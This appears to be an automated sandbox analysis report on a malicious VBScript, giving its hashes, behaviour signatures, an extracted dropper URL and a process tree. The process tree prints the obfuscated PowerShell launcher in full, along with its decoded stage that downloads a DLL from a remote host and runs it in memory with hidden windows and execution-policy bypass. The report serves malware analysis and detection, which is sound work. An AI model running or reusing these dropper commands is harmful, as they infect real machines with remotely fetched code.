Analysis

  • max time kernel
    143s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-07-2023 15:26

General

  • Target

    whatyoudowhereyouat.vbs

  • Size

    325KB

  • MD5

    488acf579270c341ddf2616f04cd73f6

  • SHA1

    a013ca4551c135af35d2af66ad8a6a1a14e00888

  • SHA256

    ce9afd85592a8a55ee6d020b3582644e0e1249571a0443757cc31d7214597a78

  • SHA512

    31051ba36949caae0293a12f8b2cbc9cbf5801293ce435208d4ca9ddaed0b78f490aa1e57c52425ea304f7442a9465104ad62b71b35c73e402a7b11c1101fbc1

  • SSDEEP

    3072:I5n5L5XNsnn+Llpxn7sMxzakixvvspBOEeBQZxNj53e:RnkKMxzakZfNj5O

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://servidorarquivos.duckdns.org/e/e

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\whatyoudowhereyouat.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:3952
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂HM⁂ZQBy⁂HY⁂aQBk⁂G8⁂cgBh⁂HI⁂cQB1⁂Gk⁂dgBv⁂HM⁂LgBk⁂HU⁂YwBr⁂GQ⁂bgBz⁂C4⁂bwBy⁂Gc⁂LwBl⁂C8⁂ZQ⁂n⁂Ck⁂KQ⁂7⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBB⁂H⁂⁂c⁂BE⁂G8⁂bQBh⁂Gk⁂bgBd⁂Do⁂OgBD⁂HU⁂cgBy⁂GU⁂bgB0⁂EQ⁂bwBt⁂GE⁂aQBu⁂C4⁂T⁂Bv⁂GE⁂Z⁂⁂o⁂CQ⁂R⁂BM⁂Ew⁂KQ⁂u⁂Ec⁂ZQB0⁂FQ⁂eQBw⁂GU⁂K⁂⁂n⁂EY⁂aQBi⁂GU⁂cg⁂u⁂Eg⁂bwBt⁂GU⁂Jw⁂p⁂C4⁂RwBl⁂HQ⁂TQBl⁂HQ⁂a⁂Bv⁂GQ⁂K⁂⁂n⁂FY⁂QQBJ⁂Cc⁂KQ⁂u⁂Ek⁂bgB2⁂G8⁂awBl⁂Cg⁂J⁂Bu⁂HU⁂b⁂Bs⁂Cw⁂I⁂Bb⁂G8⁂YgBq⁂GU⁂YwB0⁂Fs⁂XQBd⁂C⁂⁂K⁂⁂n⁂HQ⁂e⁂B0⁂C4⁂ZQBl⁂G0⁂bQBl⁂GU⁂bQBt⁂G0⁂ZQBl⁂G0⁂Lw⁂z⁂DQ⁂Lg⁂2⁂DY⁂Lg⁂4⁂Dg⁂Lg⁂1⁂DQ⁂Lw⁂v⁂Do⁂c⁂B0⁂HQ⁂a⁂⁂n⁂Ck⁂KQ⁂=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4312
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://servidorarquivos.duckdns.org/e/e'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.eemmeemmmeem/34.66.88.54//:ptth'))"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2872

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    f41839a3fe2888c8b3050197bc9a0a05

    SHA1

    0798941aaf7a53a11ea9ed589752890aee069729

    SHA256

    224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

    SHA512

    2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    235a8eb126d835efb2e253459ab8b089

    SHA1

    293fbf68e6726a5a230c3a42624c01899e35a89f

    SHA256

    5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

    SHA512

    a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vngg21jz.pg0.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2872-163-0x00007FFB3C810000-0x00007FFB3D2D1000-memory.dmp

    Filesize

    10.8MB

  • memory/2872-168-0x00007FFB3C810000-0x00007FFB3D2D1000-memory.dmp

    Filesize

    10.8MB

  • memory/2872-165-0x0000024D45FA0000-0x0000024D45FB0000-memory.dmp

    Filesize

    64KB

  • memory/2872-149-0x00007FFB3C810000-0x00007FFB3D2D1000-memory.dmp

    Filesize

    10.8MB

  • memory/2872-159-0x0000024D45FA0000-0x0000024D45FB0000-memory.dmp

    Filesize

    64KB

  • memory/2872-164-0x0000024D45FA0000-0x0000024D45FB0000-memory.dmp

    Filesize

    64KB

  • memory/4312-146-0x000002C5633E0000-0x000002C5633F0000-memory.dmp

    Filesize

    64KB

  • memory/4312-162-0x000002C5633E0000-0x000002C5633F0000-memory.dmp

    Filesize

    64KB

  • memory/4312-161-0x000002C5633E0000-0x000002C5633F0000-memory.dmp

    Filesize

    64KB

  • memory/4312-160-0x00007FFB3C810000-0x00007FFB3D2D1000-memory.dmp

    Filesize

    10.8MB

  • memory/4312-148-0x000002C5633E0000-0x000002C5633F0000-memory.dmp

    Filesize

    64KB

  • memory/4312-147-0x000002C5633E0000-0x000002C5633F0000-memory.dmp

    Filesize

    64KB

  • memory/4312-145-0x00007FFB3C810000-0x00007FFB3D2D1000-memory.dmp

    Filesize

    10.8MB

  • memory/4312-144-0x000002C5632F0000-0x000002C563312000-memory.dmp

    Filesize

    136KB

  • memory/4312-172-0x00007FFB3C810000-0x00007FFB3D2D1000-memory.dmp

    Filesize

    10.8MB